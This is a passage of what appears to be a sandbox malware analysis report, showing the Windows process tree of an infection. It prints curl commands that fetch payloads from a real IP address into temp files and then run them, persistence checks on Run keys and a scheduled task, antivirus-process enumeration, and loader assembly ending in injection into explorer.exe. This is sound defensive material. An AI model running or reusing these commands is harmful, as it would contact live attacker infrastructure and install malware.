        curl -s -o "C:\Users\Admin\AppData\Local\temp\uydpg" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3600
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\aqvdy" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2604
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\aqvdy" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:600
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:1396
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3028
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:2976
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3392
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2864
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2872
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\orcby" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:392
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\orcby" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1584
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eduyn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:800
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\eduyn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4508
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\keyfq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1532
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\keyfq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3644
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ewhoo" "178.215.224.74/v10/ukyh.php?jspo=2&jwvs=9D285DD33A798DB434A97C25125FCD&zeqb=8&nehq=1"
        5⤵
        
        PID:1740
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ewhoo" "178.215.224.74/v10/ukyh.php?jspo=2&jwvs=9D285DD33A798DB434A97C25125FCD&zeqb=8&nehq=1"
        6⤵
        
        PID:1036
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ysmgk" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4044
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ysmgk" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dhwkg" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5056
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\dhwkg" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3952
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\catpr" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4664
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\catpr" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3468
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bccfw" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cm0uZXhl"
        5⤵
        
        PID:3464
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\bccfw" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cm0uZXhl"
        6⤵
        
        PID:4884
    - - C:\Users\Admin\AppData\Local\temp\rm.exe
        
        "C:\Users\Admin\AppData\Local\temp\rm.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2440
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Usually Usually.cmd & Usually.cmd
        6⤵
        
        PID:2364
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:396
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        7⤵
        
        PID:3936
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4136
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        7⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 715447
        7⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "LeagueSpatialClearingInvoice" Covered
        7⤵
        
        PID:4060
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Bernard + ..\Marine + ..\Runtime + ..\Acquire + ..\Provided + ..\Retirement + ..\Vagina + ..\Never + ..\Calculations + ..\Bloody + ..\Alt n
        7⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\715447\Challenges.pif
        
        Challenges.pif n
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1316
        
        C:\Users\Admin\AppData\Local\Temp\log.exe
        
        "C:\Users\Admin\AppData\Local\Temp\log.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4012
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Automated Automated.bat & Automated.bat
        9⤵
        
        PID:1044
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        10⤵
        Enumerates processes with tasklist
        
        PID:1844
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        10⤵
        
        PID:4736
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        10⤵
        Enumerates processes with tasklist
        
        PID:2484
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        10⤵
        
        PID:4808
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 715621
        10⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "lockingaccuracycriticismmileage" Ladies
        10⤵
        
        PID:620
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Rating + ..\Mere + ..\Livestock + ..\Obesity + ..\Pearl + ..\Unlimited + ..\Ion + ..\Work + ..\Darkness + ..\Slip + ..\Participating + ..\Expenses + ..\Fiji + ..\Dev + ..\Diversity + ..\Middle + ..\Compete + ..\Speak + ..\Victor + ..\Delete + ..\Body + ..\Residence + ..\Blogs + ..\Absorption + ..\Invasion + ..\National + ..\Identifier + ..\Hood + ..\Une + ..\Complications + ..\Waves + ..\Actress + ..\Careful + ..\Suffered + ..\Likes + ..\Sept + ..\Institutions + ..\Afternoon + ..\Novels + ..\Teaches + ..\Governor + ..\Calendar + ..\Exemption + ..\Toolbar + ..\Attacked + ..\Utils + ..\Rate + ..\Cancer + ..\Subsequent + ..\Falls S
        10⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\715621\Mechanics.pif
        
        Mechanics.pif S
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:228
        
        C:\Users\Admin\AppData\Local\Temp\715621\Mechanics.pif
        
        C:\Users\Admin\AppData\Local\Temp\715621\Mechanics.pif
        11⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3612
        
        C:\Windows\explorer.exe
        
        explorer.exe
        12⤵
        Suspicious use of FindShellTrayWindow
        
        PID:4076
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        10⤵
        
        PID:2804
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\qncelrvovziduovtrpz.vbs"
        8⤵
        
        PID:3136
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        
        PID:468
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lakns" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2804
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lakns" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3984
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mblff" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2448
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\mblff" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:916
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fmvii" "178.215.224.74/v10/ukyh.php?jspo=2&jwvs=9D285DD33A798DB434A97C25125FCD&zeqb=8&nehq=2"
        5⤵
        
        PID:3504
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fmvii" "178.215.224.74/v10/ukyh.php?jspo=2&jwvs=9D285DD33A798DB434A97C25125FCD&zeqb=8&nehq=2"
        6⤵
        
        PID:4440
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zeyht" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3000
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zeyht" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:416
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rhrvy" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=9D285DD33A798DB434A97C25125FCD&vprl=2"
        5⤵
        
        PID:208
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rhrvy" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=9D285DD33A798DB434A97C25125FCD&vprl=2"
        6⤵
        
        PID:4436
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3248
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:4540
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4872
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:2216
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:1340
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2640
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sabfg" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:776
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\sabfg" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4524
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\avrbn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4612
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\avrbn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4940
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nuayr" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4236
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nuayr" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1596
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1740
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3680
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3200
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:64
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3952
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:376
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bnnbv" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4604
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\bnnbv" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2476
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ojkzh" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:2432
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ojkzh" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3000
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\uvzgf" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1440
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\uvzgf" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2128
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:1344
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:1912
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4264
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:5100
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2500
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\uoxdv" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2692
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\uoxdv" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:536
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\spdye" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:400
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\spdye" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:1904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fzecr" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4524
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fzecr" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2320
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:224
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4424
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1152
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3036
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3544
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sunho" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2348
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\sunho" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1460
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rnqyi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1896
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rnqyi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4580
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lvaet" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1948
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lvaet" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1472
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:656
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:4236
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:848
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:2652
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2984
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2180
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ompjb" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3860
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ompjb" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3712
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hxpjt" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1660
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\hxpjt" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:2428
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cpuyc" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2924
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\cpuyc" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:644
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3536
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3844
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:2412
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3980
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2724
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3920
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eacaf" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4516
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\eacaf" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4648
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fuugd" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4884
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fuugd" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9D285DD33A798DB434A97C25125FCD&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:404
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fllup" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5112
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fllup" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4252
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3404
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4544
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:2244
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1912
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4264
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3480
    - - C:\Windows\SysWOW64\cmd.exe
        
